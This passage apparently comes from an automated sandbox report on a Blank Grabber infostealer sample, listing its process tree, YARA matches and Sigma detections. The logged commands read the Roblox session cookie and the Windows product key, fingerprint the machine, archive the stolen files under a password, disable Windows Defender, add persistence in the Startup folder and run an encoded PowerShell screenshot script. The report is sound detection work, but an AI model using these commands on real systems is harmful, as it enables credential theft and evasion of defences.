        • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 7392 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 6996 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 3032 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7396 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8084 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 4340 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 6684 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7228 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7644 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8124 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6828 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 2564 cmdline: C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 4232 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6836 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5896 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7652 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8060 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7220 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7152 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7264 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7780 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7892 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5900 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7760 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI33962\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000003.1686994735.000001E7C3B87000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000007.00000003.1689633424.000001E7C39E2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000007.00000002.1709310873.000001E7C39E3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000004.00000003.1275666676.000001FB29EE5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 6 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\X9g8L63QGs.exe", ParentImage: C:\Users\user\Desktop\X9g8L63QGs.exe, ParentProcessId: 3800, ParentProcessName: X9g8L63QGs.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'", ProcessId: 1476, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Disable Scan Feature
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\X9g8L63QGs.exe", ParentImage: C:\Users\user\Desktop\X9g8L63QGs.exe, ParentProcessId: 3800, ParentProcessName: X9g8L63QGs.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 1260, ProcessName: cmd.exe
              Sigma detected: Rar Usage with Password and Compression Level
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\X9g8L63QGs.exe", ParentImage: C:\Users\user\Desktop\X9g8L63QGs.exe, ParentProcessId: 3800, ParentProcessName: X9g8L63QGs.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *", ProcessId: 6828, ProcessName: cmd.exe
              Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
              Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 6836, StartAddress: 2B6F32B0, TargetImage: C:\Windows\System32\systeminfo.exe, TargetProcessId: 6836
              Sigma detected: Suspicious Encoded PowerShell Command Line
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious PowerShell Encoded Command Patterns
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious Startup Folder Persistence
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\X9g8L63QGs.exe, ProcessId: 3800, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
